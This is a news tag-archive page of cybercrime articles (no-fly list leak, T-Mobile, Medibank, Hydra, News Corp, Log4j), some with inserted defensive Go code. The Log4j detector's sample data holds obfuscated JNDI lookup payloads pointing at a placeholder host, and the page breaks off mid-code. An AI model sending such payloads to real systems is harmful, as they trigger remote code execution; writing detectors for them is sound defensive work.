Tag Archives: Cybercrime

The No-Fly List Has Been Leaked, Pokemon Briefly Involved

The Transportation Security Administration’s No-Fly List is one of the most important ledgers in the United States, containing as it does the names of people who are perceived to be of such a threat to national security that they’re not allowed on airplanes. You’d have been forgiven then for thinking that list was a tightly-guarded state secret, but lol, nope.

A Swiss hacker known as “maia arson crimew” has got hold of a copy of the list—albeit a version from a few years ago—not by getting past fortress-like layers of cybersecurity, but by…finding a regional airline that had its data lying around in unprotected servers. They announced the discovery with the photo and screenshot above, in which the Pokémon Sprigatito is looking awfully pleased with themselves.

As they explain in a blog post detailing the process, crimew was poking around online when they found that CommuteAir’s servers were just sitting there:

like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, chinese shodan), looking for exposed jenkins servers that may contain some interesting goods. at this point i’ve probably clicked through about 20 boring exposed servers with very little of any interest, when i suddenly start seeing some familiar words. “ACARS”, lots of mentions of “crew” and so on. lots of words i’ve heard before, most likely while binge watching Mentour Pilot YouTube videos. jackpot. an exposed jenkins server belonging to CommuteAir.

Among other “sensitive” information on the servers was “NOFLY.CSV”, which hilariously was exactly what it says on the box: “The server contained data from a 2019 version of the federal no-fly list that included first and last names and dates of birth,” CommuteAir Corporate Communications Manager Erik Kane told the Daily Dot, which worked with crimew to sift through the data. “In addition, certain CommuteAir employee and flight information was accessible. We have submitted notification to the Cybersecurity and Infrastructure Security Agency and we are continuing with a full investigation.”

That “employee and flight information” includes, as crimew writes:

grabbing sample documents from various s3 buckets, going through flight plans and dumping some dynamodb tables. at this point i had found pretty much all PII imaginable for each of their crew members. full names, addresses, phone numbers, passport numbers, pilot’s license numbers, when their next linecheck is due and much more. i had trip sheets for every flight, the potential to access every flight plan ever, a whole bunch of image attachments to bookings for reimbursement flights containing yet again more PII, airplane maintenance data, you name it.

The government is now investigating the leak, with the TSA telling the Daily Dot it is “aware of a potential cybersecurity incident, and we are investigating in coordination with our federal partners”.

If you’re wondering just how many names are on the list, it’s hard to tell. Crimew tells Kotaku that in this version of the records “there are about 1.5 million entries, but given a lot are different aliases for different people it’s very hard to know the actual number of unique people on it” (a 2016 estimate had the numbers at “2,484,442 records, consisting of 1,877,133 individual identities”).

Interestingly, given the list was uploaded to CommuteAir’s servers in 2022, it was assumed that was the year the records were from. Instead, crimew tells me “the only reason we [now] know [it] is from 2019 is because the airline keeps confirming so in all their press statements, before that we assumed it was from 2022.”

The full write-up is on crimew’s blog, while the Daily Dot post says names on the list include members of the IRA and an eight-year-old.

Read original article here

T-Mobile Says Hackers Stole Data on About 37 Million Customers

T-Mobile US Inc. said hackers accessed data, including birth dates and billing addresses, for about 37 million of its customers, the second major security lapse at the wireless company in two years.

The company said in a regulatory filing Thursday that it discovered the problem on Jan. 5 and was working with law-enforcement officials and cybersecurity consultants. T-Mobile said it believes the hackers had access to its data since Nov. 25 but that it has since been able to stop the malicious activity.

The cellphone carrier said it is currently notifying affected customers and that it believes the most sensitive types of records—such as credit card numbers, Social Security numbers and account passwords—weren’t compromised. T-Mobile has more than 110 million customers.

The company said its preliminary investigation indicates that data on about 37 million current postpaid and prepaid customer accounts was exposed. The company said hackers may have obtained names, billing addresses, emails, phone numbers, birth dates and account numbers. Information such as the number of lines on the account and plan features could have also been accessed, the company said.

“Some basic customer information (nearly all of which is the type widely available in marketing databases or directories) was obtained,” T-Mobile said in a statement. “No passwords, payment card information, social security numbers, government ID numbers or other financial account information were compromised.”

The company said its systems weren’t breached but someone was improperly obtaining data through an API, or application programming interface, that can provide some customer information. The company said it shut down the activity within 24 hours of discovering it.
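What “improperly obtaining data through an API” looks like in telemetry, as an added example that is not drawn from T-Mobile (the page describes no logs; the log format, client names and account IDs below are constructed): every request carries a valid credential, so per-request authorisation passes, and the only thing a gateway can still see is breadth, one caller reading far more distinct accounts in a window than any legitimate integration needs. The window size and threshold are illustrative assumptions.

```go
package main

import (
	"fmt"
	"sort"
	"strconv"
	"strings"
	"time"
)

// Constructed API-gateway log lines (not T-Mobile's format; the page describes
// none): an RFC 3339 timestamp followed by key=value fields.
const sampleLog = `2022-11-25T10:00:05Z client=partner-a path=/v1/account account=A1001 status=200
2022-11-25T10:01:00Z client=scraper-9 path=/v1/account account=A2001 status=200
2022-11-25T10:01:10Z client=scraper-9 path=/v1/account account=A2002 status=200
2022-11-25T10:01:20Z client=scraper-9 path=/v1/account account=A2003 status=404
2022-11-25T10:01:30Z client=scraper-9 path=/v1/account account=A2004 status=200
2022-11-25T10:01:40Z client=scraper-9 path=/v1/account account=A2005 status=200
2022-11-25T10:01:50Z client=scraper-9 path=/v1/account account=A2006 status=200
2022-11-25T10:07:45Z client=partner-a path=/v1/account account=A1002 status=200
2022-11-25T10:12:00Z client=scraper-9 path=/v1/account account=A2007 status=200`

type Event struct {
	TS              time.Time
	Client, Account string
	Status          int
}

type Alert struct {
	Client      string
	WindowStart time.Time
	Distinct    int // distinct account IDs this client read in the window
	NotFound    int // 404s in the window: a hint the caller is guessing IDs
}

// ParseLine parses one log line. A line without timestamp, client and account is
// an error, not a silent zero-valued event; a bad status becomes 0 (never a 404).
func ParseLine(line string) (Event, error) {
	fields := strings.Fields(line)
	if len(fields) < 2 {
		return Event{}, fmt.Errorf("too few fields: %q", line)
	}
	ts, err := time.Parse(time.RFC3339, fields[0])
	if err != nil {
		return Event{}, err
	}
	kv := map[string]string{}
	for _, f := range fields[1:] {
		k, v, _ := strings.Cut(f, "=")
		kv[k] = v
	}
	status, _ := strconv.Atoi(kv["status"])
	ev := Event{ts, kv["client"], kv["account"], status}
	if ev.Client == "" || ev.Account == "" {
		return Event{}, fmt.Errorf("missing client or account: %q", line)
	}
	return ev, nil
}

// DetectEnumeration buckets requests into tumbling windows per client and alerts
// when one caller reads more distinct accounts than threshold. Each request was
// individually authorised; the breadth of accounts per caller is the signal.
func DetectEnumeration(lines []string, window time.Duration, threshold int) ([]Alert, error) {
	type key struct{ client string; start time.Time }
	seen := map[key]map[string]bool{}
	notFound := map[key]int{}
	for _, line := range lines {
		ev, err := ParseLine(line)
		if err != nil {
			return nil, err
		}
		k := key{ev.Client, ev.TS.Truncate(window)}
		if seen[k] == nil {
			seen[k] = map[string]bool{}
		}
		seen[k][ev.Account] = true
		if ev.Status == 404 {
			notFound[k]++
		}
	}
	var alerts []Alert
	for k, accounts := range seen {
		if len(accounts) > threshold {
			alerts = append(alerts, Alert{k.client, k.start, len(accounts), notFound[k]})
		}
	}
	sort.Slice(alerts, func(i, j int) bool { return alerts[i].WindowStart.Before(alerts[j].WindowStart) })
	return alerts, nil
}

func main() {
	alerts, err := DetectEnumeration(strings.Split(sampleLog, "\n"), 10*time.Minute, 5)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("ALERT client=%s window=%s distinct=%d not_found=%d\n", a.Client, a.WindowStart.Format(time.RFC3339), a.Distinct, a.NotFound)
	}
}
```

With the sample above, partner-a touches two accounts and is never flagged, while scraper-9 reads six distinct accounts inside one ten-minute window and raises a single alert; the 404 count rides along because a caller guessing identifiers tends to miss some. The caveat the T-Mobile timeline illustrates (access from Nov. 25, discovery on Jan. 5) is that a rule like this only helps if it runs continuously against the gateway logs, not once an incident is already suspected.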

The company’s investigation into the incident is ongoing. T-Mobile warned that it could incur significant costs tied to the incident, though it said it doesn’t currently expect a material effect on the company’s operations. The company is set to report fourth-quarter results on Feb. 1.

T-Mobile acknowledged a security lapse in 2021 after personal information regarding more than 50 million of its current, former and prospective customers was found for sale online. T-Mobile later raised its estimate and said about 76.6 million U.S. residents had some sort of records exposed.

A 21-year-old American living in Turkey claimed credit for the 2021 intrusion and said the company’s security practices cleared an easy path for the theft of the data, which included Social Security numbers, birth dates and phone-specific identifiers. T-Mobile’s chief executive later apologized for the failure and said the company would improve its data safeguards.

T-Mobile proposed paying $350 million to settle a class-action lawsuit tied to the 2021 hack. As part of the settlement, the company also pledged to spend $150 million for security technology in 2022 and this year.

Write to Will Feuer at Will.Feuer@wsj.com

Corrections & Amplifications
T-Mobile US Inc. acknowledged a security lapse in 2021. An earlier version of this article incorrectly said it was last year. (Corrected on Jan. 19)

Copyright ©2022 Dow Jones & Company, Inc. All Rights Reserved. 87990cbe856818d5eddac44c7b1cdeb8


Apple Plans New Encryption System to Ward Off Hackers and Protect iCloud Data

Apple Inc. is planning to significantly expand its data-encryption practices, a step that is likely to create tensions with law enforcement and governments around the world as the company continues to build new privacy protections for millions of iPhone users.

The expanded end-to-end encryption system, an optional feature called Advanced Data Protection, would protect most data stored in iCloud, an Apple service many of its users rely on to store photos, back up their iPhones or save specific device data such as Notes and Messages. The data would remain protected even if Apple itself were hacked, and it also wouldn’t be accessible to law enforcement, even with a warrant.

While Apple has drawn attention in the past for being unable to help agencies such as the Federal Bureau of Investigation access data on its encrypted iPhones, it has been able to provide much of the data stored in iCloud backups upon a valid legal request. Last year, it responded to thousands of such requests in the U.S., according to the company. 

With these new security enhancements, Apple would no longer have the technical ability to comply with certain law-enforcement requests such as for iCloud backups—which could include iMessage chat logs and attachments and have been used in many investigations.

Photo: Apple has added additional methods to help users recover their end-to-end encrypted data. (Credit: Apple)

The company said the security enhancements, which were announced Wednesday, are designed to protect Apple customers from the most sophisticated attackers.

“As customers have put more and more of their personal information of their lives into their devices, these have become more and more the subject of attacks by advanced actors,” said Craig Federighi, Apple’s senior vice president of software engineering, in an interview. Some of these actors are going to great lengths to get their hands on the private information of people they have targeted, he said.

The FBI said it was “deeply concerned with the threat end-to-end and user-only-access encryption pose,” according to a statement provided by an agency spokeswoman. “This hinders our ability to protect the American people from criminal acts ranging from cyberattacks and violence against children to drug trafficking, organized crime and terrorism,” the statement said. The FBI and law enforcement agencies need “lawful access by design,” it said.

A spokesman for the Justice Department declined to comment.

Former Western law-enforcement and intelligence officials said they were surprised by Apple’s decision in part because the company had refrained in the past from rolling out such encryption settings for iCloud. The officials said Apple would sometimes point authorities to the iCloud as a possible means of collecting information that could be useful for criminal investigations.

Ciaran Martin, former chief of the U.K.’s National Cyber Security Centre, said the announcement by Apple could pose legal complications for the company in multiple democracies that in recent years have adopted or weighed restrictions on technology that can’t be responsive to law-enforcement demands.

“Things will only be clearer when further technical details are given,” Mr. Martin said. “But on the face of it, existing legislation in Australia and looming legislation in the U.K. would seem to give those governments the power to tell Apple in those countries effectively not to do this.”

Last year, Apple proposed iPhone software that would scan for child sexual-abuse material on the device itself. Apple now says it has stopped development of the system, following criticism from privacy and security researchers who worried that the software could be misused by governments or hackers to gain access to sensitive information on the phone.


Mr. Federighi said Apple’s focus related to protecting children has been on areas such as communication and giving parents tools to protect children in iMessage. “Child sexual abuse can be headed off before it occurs,” he said. “That’s where we’re putting our energy going forward.”

Apple released a feature in December 2021 called “Communication Safety” in Messages, which offers tools for parents that warn their children when they have received or attempt to send photos that contain nudity. The option is part of Apple’s “Screen Time” parental-controls software.

The new encryption system, to be tested by early users starting Wednesday, will roll out as an option in the U.S. by year’s end, and then worldwide including China in 2023, Mr. Federighi said.

“This development will prompt questions at home and abroad, including whether the government of China will really accept a loss of data access,” said Sumon Dantiki, a former senior FBI and Justice Department official who worked on cyber investigations and is now a partner at the King & Spalding law firm. U.S. officials have long pointed to China’s increasingly strict demands for access to data on companies that operate within its borders as a national-security concern.

In addition to Advanced Data Protection, Apple is also modifying its Messages app to make it harder for messages to be snooped on, and it will now allow users to log in to their Apple accounts with hardware-based security keys made by other companies such as Yubico.

Privacy groups have long called on Apple to strengthen encryption on its cloud servers. But because the Advanced Protection encryption keys will be controlled by users, the system will restrict Apple’s ability to restore lost data. 


To set up Advanced Data Protection, users will have to enable at least one data-recovery method. This could be a recovery key—a long list of numbers and characters that users could print out and store in a secure location—or the user could assign a friend or family member as a recovery contact.  

Over the past two decades, businesses and consumers have moved much of their data off computer systems that they control and onto the cloud—data centers filled with servers that are operated by large technology companies. That trend has made these cloud systems an attractive target for cyber intruders. 

Mr. Federighi said that Apple isn’t aware of any customer data being taken from iCloud by hackers but that the Advanced Protection system will make things harder for them. “All of us in the industry who manage customer data are under constant attack by entities that are attempting to breach our systems,” he said. “We have to stay ahead of future attacks with new protections.”

As Apple has locked down its systems, governments worldwide have become increasingly interested in the data stored on phones and cloud computers. That interest has led to friction between Apple and law-enforcement agencies, along with a growing market for iPhone hacking tools. In 2020, Attorney General William Barr pressured Apple for a way to crack the iPhone’s encryption to help with a terror investigation into a shooting that killed three people at a Florida Navy base.

Advanced Protection will reduce the amount of iCloud information that Apple can provide to law-enforcement agencies, who frequently request iPhone data from Apple as part of their investigations. Apple received requests for information on 7,122 Apple accounts from U.S. authorities in the first six months of 2021, the last period for which the company has provided information.

Apple had already offered end-to-end encryption for some of its services, but the protection will now extend to 23 services, including iPhone backups and Photos. However, three services—Mail, Contacts and Calendar—won’t qualify for Advanced Protection because they use older technology protocols, Mr. Federighi said.

Mr. Federighi said Apple believes it shares the same mission as law enforcement and governments: keeping people safe. If sensitive information were to get in the hands of an attacker, a foreign adversary or some other bad actor, it could be disastrous, he said. 

“We’re giving users the option to keep that key only on their devices, which means that even if an attacker were to successfully breach the cloud and access all that data, it would be nonsense to them,” Mr. Federighi said. “They’d lack the key to decrypt it.”
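The property Mr. Federighi describes, together with the recovery-key set-up described earlier in the article, reduced to working code as an added illustration. This is not Apple’s code and the page gives no implementation details: the stored-blob layout, the “wrapped-data-key” and “record” labels, the “recovery-kek-v1” derivation string and the use of plain SHA-256 to turn a recovery string into a wrapping key are all assumptions made so the example runs on its own with the Go standard library.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// Blob is all the cloud stores for one item: an AES-GCM nonce plus ciphertext
// with its authentication tag. An assumed layout for this example, not Apple's.
type Blob struct{ Nonce, Ciphertext []byte }

// CloudAccount is the server's complete view of a user: the data key wrapped under
// a key derived from the user's recovery key, plus records encrypted under it.
type CloudAccount struct {
	WrappedDataKey Blob
	Records        []Blob
}

// Device holds the only unwrapped copy of the data key.
type Device struct{ dataKey []byte }

func gcm(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

func seal(key, plaintext, aad []byte) (Blob, error) {
	g, err := gcm(key)
	if err != nil {
		return Blob{}, err
	}
	nonce := make([]byte, g.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return Blob{}, err
	}
	return Blob{nonce, g.Seal(nil, nonce, plaintext, aad)}, nil
}

// open fails on a wrong key and on any modification of nonce or ciphertext.
func open(key []byte, b Blob, aad []byte) ([]byte, error) {
	g, err := gcm(key)
	if err != nil {
		return nil, err
	}
	return g.Open(nil, b.Nonce, b.Ciphertext, aad)
}

// recoveryKEK turns the printable recovery key into a 256-bit wrapping key. Plain
// SHA-256 keeps this self-contained; a real design would use a memory-hard KDF.
func recoveryKEK(recoveryKey string) []byte {
	h := sha256.Sum256([]byte("recovery-kek-v1:" + recoveryKey))
	return h[:]
}

// Enroll generates the data key on the device and uploads only its wrapped form.
func Enroll(recoveryKey string) (*Device, *CloudAccount, error) {
	dk := make([]byte, 32)
	if _, err := rand.Read(dk); err != nil {
		return nil, nil, err
	}
	wrapped, err := seal(recoveryKEK(recoveryKey), dk, []byte("wrapped-data-key"))
	if err != nil {
		return nil, nil, err
	}
	return &Device{dk}, &CloudAccount{WrappedDataKey: wrapped}, nil
}

// Seal encrypts a record on the device; only the Blob is uploaded.
func (d *Device) Seal(plaintext []byte) (Blob, error) {
	return seal(d.dataKey, plaintext, []byte("record"))
}

// Open decrypts a record fetched from the cloud.
func (d *Device) Open(b Blob) ([]byte, error) {
	return open(d.dataKey, b, []byte("record"))
}

// Recover rebuilds a device from the recovery key alone, as on a new phone.
// A wrong key fails closed; the provider holds nothing that could help.
func Recover(acct *CloudAccount, recoveryKey string) (*Device, error) {
	dk, err := open(recoveryKEK(recoveryKey), acct.WrappedDataKey, []byte("wrapped-data-key"))
	if err != nil {
		return nil, fmt.Errorf("recovery key does not unwrap the data key: %w", err)
	}
	return &Device{dk}, nil
}

func main() {
	dev, acct, _ := Enroll("7K2M-constructed-recovery-key-Q9XD") // normally random
	rec, _ := dev.Seal([]byte("note: dentist Tuesday"))
	acct.Records = append(acct.Records, rec)
	fmt.Printf("a cloud breach yields only: %x\n", rec.Ciphertext)
	_, err := Recover(acct, "wrong-key")
	fmt.Println("wrong key:", err)
}
```

Two behaviours are the ones the article turns on. With only the cloud’s contents, an attacker, or a provider answering a warrant, holds ciphertext and a wrapped key and nothing that unwraps it, which is the “nonsense to them” Mr. Federighi describes. A user who loses the recovery key is in exactly the same position, which is why the feature cannot be enabled until a recovery method exists.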


Hacker demands $10m to stop leaking Australians’ medical records

Cyber-extortionist posts medical information purporting to show details of abortions and treatments for addiction, HIV.

A cyber-extortionist has demanded almost $10 million to stop leaking the medical records of Australians caught up in one of the country’s worst cyberattacks.

In a message posted on the dark web early on Thursday morning, the hacker said it was demanding $1 from Medibank, Australia’s largest private health insurer, for each of the 9.7 million customers affected in an enormous data breach last month.

The cybercriminal or criminal organisation also posted information purporting to link clients to their abortions, after earlier this week releasing a “naughty list” appearing to show customers who received treatments for addiction, mental health issues and HIV.

Local media have linked the dark web forum used to post the hacked data to the crime group REvil, which Russian authorities said they shut down earlier this year at the request of the United States.

Medibank CEO David Koczkar on Thursday condemned the hacker’s actions as “disgraceful” while reiterating an apology to customers.

“We remain committed to fully and transparently communicating with customers and we will be contacting customers whose data has been released on the dark web,” Koczkar said.

“The weaponisation of people’s private information in an effort to extort payment is malicious, and it is an attack on the most vulnerable members of our community.”

Medibank has refused to pay the ransom, citing advice from cybercrime experts that doing so would not ensure the return of customers’ information and could put “more people in harm’s way by making Australia a bigger target”.

The Australian Federal Police, which is investigating the cyberattack, has warned that downloading or even just accessing the data could be a criminal offence.

Home Affairs Minister Clare O’Neil has described the hackers as “scummy criminals”.

“I cannot articulate the disgust I have for the scumbags who are at the heart of this criminal act,” O’Neil told parliament on Wednesday.

The cyberattack, which first came to light last month, is the latest in a series of large data breaches to rock Australia.

Optus, Australia’s second-largest telecom provider, announced in September the data of up to 10 million customers had been compromised in a cyberattack against the company.


Hydra Darknet Market Shuttered, $25 Million in Bitcoin Seized

Photo: LagartoFilm (Getty Images)

Hydra, a longtime dark web cesspool of money laundering and drug sales, has been shut down by police.

On Tuesday, officials with Germany’s Federal Criminal Police Office announced Hydra’s demise, revealing in a press release that authorities had seized much of the site’s server infrastructure, as well as some 543 Bitcoin from the site—equivalent to approximately $25 million. Authorities say they have been investigating the illicit market’s activities since last August, with the help of several U.S. agencies, including the Justice Department, the FBI, and the Drug Enforcement Administration.

A Russian-language darknet marketplace, Hydra has been one of the largest sources of online illicit trade for several years now. The site, which has existed since at least 2015, had approximately 17 million customers and some 19,000 listed sellers prior to its shutdown, German police said. During its reign, Hydra was known as a hub for drug trafficking and obscuring the origins of cash, and its customers were based largely in eastern European states like Russia, Belarus, Ukraine, and Kazakhstan, according to the blockchain analysis firm Elliptic. Since it launched, Hydra has seen upwards of $5 billion in Bitcoin transactions, Elliptic assesses.

“The illegal marketplace was a Russian-language Darknet platform that had been accessible via the Tor network since at least 2015,” said German police officials in their press release Tuesday. “Its sales amounted to at least 1.23 billion euros in 2020 alone. In particular, the Bitcoin Bank Mixer, a service for obfuscating digital transactions provided by the platform, made crypto investigations extremely difficult for law enforcement agencies.”

Granted, dark web sites do have a habit of getting resurrected—and online crime, like offline crime, will almost always spring anew in the void of what was just taken down. Just look at the well-known crime den AlphaBay, which originally launched back in 2014 but was quashed in a police takedown in 2017. The site came back to life last summer after an administrator from the original project decided to relaunch it.

In other words, so long Hydra…for now. It remains to be seen if the site, like the mythic beast it’s named after, will regrow its heads.


Justice Department Targets ‘Spoofing’ and ‘Scalping’ in Short-Seller Investigation

Federal prosecutors are investigating whether short-sellers conspired to drive down stock prices by sharing damaging research reports ahead of time and engaging in illegal trading tactics, people familiar with the matter said.

The U.S. Justice Department has seized hardware, trading records and private communications in an effort to prove a wide-ranging conspiracy among investors who bet against corporate shares, the people said. One tactic under investigation is “spoofing,” an illegal ploy that involves flooding the market with fake orders in an effort to push a stock price up or down, they said. Another is “scalping,” where activist short-sellers cash out their positions without disclosing it.


‘Heist of the century’: US bitcoin case tests ability to crack down on cybercrime | Law (US)

The prosecution of a New York husband and wife arrested last week on suspicion of stealing $3.6bn in bitcoin in what has been described as “the heist of the century” may test US authorities’ ability to crack down on cybercrime.

It may also test the bounds of believability as more and more colorful – and downright bizarre – details emerge of the couple at the heart of the saga which seems to lie at an unlikely nexus between the cryptocurrency, rap, self-help advice and New York eccentricity.

The couple targeted in the sting, Ilya “Dutch” Lichtenstein and Heather Morgan, a self-described “badass money maker”, were charged with conspiracy to commit money laundering and conspiracy to defraud the United States. They are currently on $5m and $3m bail, respectively, but held in custody after a judge in Washington granted an emergency request by the government to keep them detained.

But prosecutors are not trying to tie them to the actual theft from a British Virgin Islands cryptocurrency exchange in 2016. Instead, the case unveiled by the Department of Justice on Tuesday alleges that the couple used a complicated web of transactions to transfer about 25,000 of the 119,754 bitcoin stolen by hackers.

The couple’s lawyer, Samson Enzer, argued in a court filing on Wednesday there were “significant holes in the government’s case against them”.

But according to Money Laundering News, the case may be the first time the government has brought a case not on the basis of an alleged theft, but on the couple’s alleged efforts to conceal their identity from virtual currency financial institutions with obligations under the Bank Secrecy Act (BSA) to report transactions to regulators.

At the time of the heist, the coins were valued at $71m but are now worth about $4.5bn – according to various virtual currency exchangers.

According to the government’s Statement of Facts, the stolen bitcoin was “layered” and “chain-hopped” through a series of virtual wallets to the “darknet market AlphaBay” and then back, and finally on to accounts where it was converted into fiat currency, gift cards and precious metals and withdrawn as cash from bitcoin ATMs.

What may be more fascinating is that the couple at the center of what US prosecutors have described as the largest financial seizure in the history of the Department of Justice were able to utilize so little of the stolen cryptocurrency.

Authorities said more than 80% of the stolen currency remained untouched in accounts associated with the couple and money-laundering allegations against them identify only small sums, including the purchase of a $500 Walmart gift card and gift cards for Uber, Hotels.com and PlayStation.

Indeed, the pair’s entire lifestyle hardly matches what one might imagine of criminals whose alleged theft has such an astonishingly high value.

Their Manhattan apartment was rented and cluttered with cat toys and exercise equipment. They walked their Bengal cat named Clarissa on a leash. The pair had a huge social media and internet presence with many hours of video and other postings. In one, unearthed by Vice, Lichtenstein apparently was filmed eating cat food.

Morgan presented herself variously as “the Crocodile of Wall Street”, “Razzlekhan”, a surrealist artist and rapper with “more pizzazz than Genghis Khan”, as well as the “Turkish Martha Stewart” and the “Waffle Queen of Korea”. She wrote on her website that she was always pushing the limits.

“Whether that leads to something wonderful or terrible is unclear; the only thing that’s certain is it won’t be boring or mediocre,” she said.

In that respect she was not wrong.

In a column for Forbes magazine that reeks with cheeky hindsight she wrote about “Experts Share Tips To Protect Your Business From Cybercriminals” accompanied by an author biography that puffed “when she’s not reverse-engineering black markets to think of better ways to combat fraud and cyber crime, she enjoys rapping and designing streetwear fashion”.

She posted singles and videos on YouTube, including a 2019 song, Versace Bedouin – described as an “anthem for misfits and weirdos” – while dressed in a gold lamé jacket in front of a statue of George Washington in New York’s financial district. She gave a talk at the Williamsburg hotel in Brooklyn titled “How to Social Engineer Your Way Into Anything”.

Her husband disclosed in a Facebook post that he had planned his marriage proposal around “a weird, creative multi-channel marketing campaign” that featured posters and digital ads that “captured the essence of Razzlekhan: surreal, mysterious, creepy and sexy”.

But their downfall may have come because bitcoin is more easily traced on blockchain – a financial ledger – than other cryptocurrencies and because they simply had too much of it.

“It [would be] mindbogglingly stupid to steal this much bitcoin,” Frank Weert, the co-founder of Whale Alert, a blockchain tracking and analytics company, told the Financial Times. “If they had stolen 500 bitcoin, no one would have bothered trying to find them, but this was the heist of the century.”


Cyberattack on News Corp, Believed Linked to China, Targeted Emails of Journalists, Others

News Corp was the target of a hack that accessed emails and documents of some employees, including journalists, an incursion the company’s cybersecurity consultant said was likely meant to gather intelligence to benefit China’s interests.

The attack, discovered on Jan. 20, affected a number of publications and business units including The Wall Street Journal and its parent Dow Jones; the New York Post; the company’s U.K. news operation; and News Corp headquarters, according to an email the company sent to staff Friday.

News Corp said it notified law enforcement and hired cybersecurity firm Mandiant Inc. to support an investigation.

“Mandiant assesses that those behind this activity have a China nexus, and we believe they are likely involved in espionage activities to collect intelligence to benefit China’s interests,” said David Wong, vice president of incident response at Mandiant.

News Corp disclosed the hack in a securities filing Friday, saying its preliminary analysis indicates that data was taken.

Representatives for the Chinese Embassy in Washington didn’t immediately respond to requests for comment.

News Corp said in the memo to staff it believes the threat activity is contained. The company has been offering guidance to affected employees.

“We are committed to protecting our journalists and sources. We will not be deterred from our purpose—to provide uniquely trusted journalism and analysis. We will continue to publish the important stories of our time,” said Almar Latour, chief executive of Dow Jones and publisher of The Wall Street Journal.

The company’s investigation indicates that systems housing financial and customer data, including subscriber information, weren’t affected, according to the securities filing and a person familiar with the matter.

Law-enforcement officials and cybersecurity experts say that journalists are often high-priority targets for hackers seeking to gain intelligence on behalf of foreign governments, because they speak to sources who might have valuable or sensitive information. Powerful surveillance tools have been used against journalists and human-rights activists.

U.S. authorities have accused China-based hackers for years of targeting a range of American businesses and government institutions. FBI Director Christopher Wray said this week that Beijing is running a “massive, sophisticated hacking program that is bigger than those of every other major nation combined.” The FBI has more than 2,000 active investigations related to allegations of Chinese-government-directed theft of U.S. information or technology, Mr. Wray said.

China has repeatedly denied allegations that it has carried out cyberattacks.

In 2013, Chinese hackers trying to monitor news coverage of China hacked into the Journal’s network, apparently aiming to spy on reporters covering China and other issues, the Journal reported. The New York Times had experienced a similar attack. At the time, a Chinese embassy spokesman condemned allegations of Chinese cyberspying and said Beijing prohibits cyberattacks.

In February 2020, China revoked the press credentials of three Journal reporters based in Beijing. China’s Foreign Ministry said the move was punishment for an opinion piece published by the Journal. The three journalists work for the Journal’s news operation, which operates with a strict separation from the opinion staff.

The following month, the Trump administration announced a personnel cap in the U.S. on four state-run Chinese media outlets. Later that March, China expelled from the country American journalists from multiple news organizations, including the Journal.

In November 2021, each country agreed to ease visa restrictions for the other’s reporters. The Journal was among a handful of U.S. outlets set to receive new press credentials for some staff.

Write to Alexandra Bruell at alexandra.bruell@wsj.com and Sadie Gurman at sadie.gurman@wsj.com


NASA Denies It Used Log4j in Its Mars Ingenuity Helicopter

Photo: PATRICK T. FALLON/AFP (Getty Images)

Did log4j, the buggy software utility from hell, get NASA’s experimental Mars helicopter hacked? The answer is: nope. According to NASA, it doesn’t even use the doomed tool.

The Register originally reported that Ingenuity, one of two Mars-based vehicles operated by America’s space agency, uses log4j. In fact, Apache, the maker of the ubiquitous, vulnerability-ridden tool, apparently tweeted back in June that the space-chopper was “powered by” log4j. (File that under things that haven’t aged particularly well.) Predictably, the tweet has since been deleted but the Wayback Machine shows the evidence.

All that “powered by” business was apparently incorrect, with the company telling Futurism that it was “misinformed.”

Log4j, in case you’ve missed it, is a widely used Java logging library from the Apache Software Foundation that was recently discovered to be afflicted with serious security vulnerabilities that could easily get you hacked. It has been used by virtually everyone, from coders at Twitter and Apple to those at Amazon and LinkedIn. But not, apparently, the NASA engineers who built Ingenuity.
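The article doesn’t name the mechanism, but the flaw in question (CVE-2021-44228, widely known as Log4Shell) fires when attacker-controlled text such as a User-Agent header is logged through Log4j 2 and the library evaluates a ${jndi:...} lookup inside it, fetching and running remote code. Attackers wrap the word jndi in nested lookups so that naive pattern matching misses it. Below is an added detection example of the kind a defender writes for request logs; it is not from the page or from Apache, the request lines are constructed, and the set of obfuscations it undoes (lower, upper and the :- default-value form) is the common set rather than an exhaustive one.

```go
package main

import (
	"fmt"
	"strings"
)

// Constructed request-log values (made-up User-Agents and paths; the address is
// from the 203.0.113.0/24 documentation range). Not taken from any real log.
var sampleRequests = []string{
	`GET / HTTP/1.1 ua="Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/95.0"`,
	`GET / HTTP/1.1 ua="${jndi:ldap://203.0.113.5:1389/a}"`,
	`GET /login HTTP/1.1 ua="${${lower:j}ndi:ldap://203.0.113.5/a}"`,
	`GET / HTTP/1.1 ua="${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/x}"`,
	`GET /?q=${${env:NOPE:-j}ndi:${lower:LDAP}://203.0.113.5/a} HTTP/1.1 ua="curl/7.81"`,
	`GET / HTTP/1.1 ua="${lower:HELLO} ${date:yyyy}"`,
}

// resolveOnce rewrites one innermost lookup of a kind attackers use to hide the
// literal "jndi" and reports whether anything changed:
//   ${lower:X} -> lowercase X
//   ${upper:X} -> uppercase X
//   ${name:-X} -> X  (Log4j default-value syntax: ${::-j}, ${env:NOPE:-j}, ...)
// Every other lookup, the jndi one included, is left exactly where it is.
func resolveOnce(s string) (string, bool) {
	for start := strings.LastIndex(s, "${"); start >= 0; start = strings.LastIndex(s[:start], "${") {
		rel := strings.Index(s[start:], "}")
		if rel < 0 {
			continue
		}
		end := start + rel
		body := s[start+2 : end]
		if strings.Contains(body, "${") || strings.HasPrefix(strings.ToLower(body), "jndi:") {
			continue // not innermost, or the payload itself
		}
		var val string
		switch lower := strings.ToLower(body); {
		case strings.Contains(body, ":-"):
			val = body[strings.Index(body, ":-")+2:]
		case strings.HasPrefix(lower, "lower:"):
			val = strings.ToLower(body[len("lower:"):])
		case strings.HasPrefix(lower, "upper:"):
			val = strings.ToUpper(body[len("upper:"):])
		default:
			continue
		}
		return s[:start] + val + s[end+1:], true
	}
	return s, false
}

// Normalize applies resolveOnce until nothing changes. Each step strictly
// shortens the string, so it terminates; the bound is a belt-and-braces guard.
func Normalize(s string) string {
	for i := 0; i < 256; i++ {
		next, changed := resolveOnce(s)
		if !changed {
			return next
		}
		s = next
	}
	return s
}

// IsJNDIProbe reports whether the value still carries a jndi lookup after
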